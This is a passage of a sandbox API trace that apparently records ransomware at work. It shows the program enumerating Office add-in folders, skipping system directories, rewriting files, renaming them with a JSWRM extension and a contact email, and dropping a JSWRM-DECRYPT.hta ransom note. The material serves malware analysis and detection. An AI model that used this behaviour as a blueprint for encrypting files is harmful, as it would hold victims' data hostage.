[0124.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0124.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0124.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0124.391] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14b330aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x515e9, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.kk.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2=".") returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="..") returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="...") returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="windows") returned -1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="recovery") returned -1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="perflogs") returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="documents and settings") returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="system volume information") returned -1 [0124.391] lstrcmpiW (lpString1="PowerViewRes.kk.xap", lpString2="msocache") returned 1 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.kk.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0124.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.kk.xap", cchWideChar=19, lpMultiByteStr=0x241100, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.kk.xap", lpUsedDefaultChar=0x0) returned 19 [0124.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.kk.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0124.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.kk.xap", cchWideChar=19, lpMultiByteStr=0x241038, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.kk.xap", lpUsedDefaultChar=0x0) returned 19 [0124.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0124.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0124.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\PowerViewRes.kk.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\powerviewres.kk.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.398] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=333289) returned 1 [0124.398] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.398] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.411] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.411] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.412] CloseHandle (hObject=0x338) returned 1 [0124.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0124.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0124.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0124.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0124.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.413] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\PowerViewRes.kk.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\powerviewres.kk.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\PowerViewRes.kk.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\powerviewres.kk.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0124.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0124.414] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14b330aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x515e9, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.kk.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.414] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0124.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0124.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.415] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14ac0994, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0124.415] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="...") returned 1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="windows") returned -1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="recovery") returned -1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="perflogs") returned -1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="documents and settings") returned 1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="$RECYCLE.BIN") returned 1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="system volume information") returned -1 [0124.415] lstrcmpiW (lpString1="ko", lpString2="msocache") returned -1 [0124.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0124.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0124.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0124.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0124.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\jswrm-decrypt.hta")) returned 0xffffffff [0124.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0124.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0124.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0124.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0124.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0124.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.418] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.418] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.419] CloseHandle (hObject=0x314) returned 1 [0124.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0124.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0124.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\jswrm-decrypt.hta")) returned 0x20 [0124.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0124.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.419] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40d11178, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0124.419] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.420] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40d11178, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.420] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.420] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.420] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14b330aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc18a8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.420] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0124.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241178, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0124.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0124.420] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40d11178, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40d11178, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40d11178, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0124.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0124.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0124.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0124.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0124.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0124.421] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a04f26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.421] lstrcmpiW 